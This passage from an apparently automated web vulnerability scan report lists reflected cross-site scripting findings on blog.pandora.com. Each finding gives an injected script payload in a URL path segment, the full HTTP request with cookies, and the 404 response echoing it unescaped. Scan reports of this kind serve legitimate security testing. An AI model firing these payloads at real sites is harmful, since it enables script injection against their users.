This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ was not found on this server.</p>
...[SNIP]...

3.45. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)</script>96a3bdaf0ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ was not found on this server.</p>
...[SNIP]...

3.46. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)</script>6b31a0b7960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ was not found on this server.</p>
...[SNIP]...

3.47. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)</script>c48ada1686b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ was not found on this server.</p>
...[SNIP]...

3.48. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)</script>9eb948f65af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ was not found on this server.</p>
...[SNIP]...

3.49. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)</script>a463141d672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ was not found on this server.</p>
...[SNIP]...

3.50. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)</script>535a013270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ was not found on this server.</p>
...[SNIP]...

3.51. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)</script>cbe6a64b700 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ was not found on this server.</p>
...[SNIP]...

3.52. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)</script>fa977886cf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ was not found on this server.</p>
...[SNIP]...

3.53. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)</script>dd135c67fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ was not found on this server.</p>
...[SNIP]...

3.54. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)</script>470ea815a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ was not found on this server.</p>
...[SNIP]...

3.55. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)</script>a5036d92cf6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ was not found on this server.</p>
...[SNIP]...

3.56. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)</script>12e73a2793e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ was not found on this server.</p>
...[SNIP]...

3.57. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>e86a08eb842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ was not found on this server.</p>
...[SNIP]...

3.58. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)</script>7bc942491d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ was not found on this server.</p>
...[SNIP]...

3.59. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)</script>683adabb342 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ was not found on this server.</p>
...[SNIP]...

3.60. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)</script>e86910f5065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ was not found on this server.</p>
...[SNIP]...

3.61. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)</script>e3aabb416ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
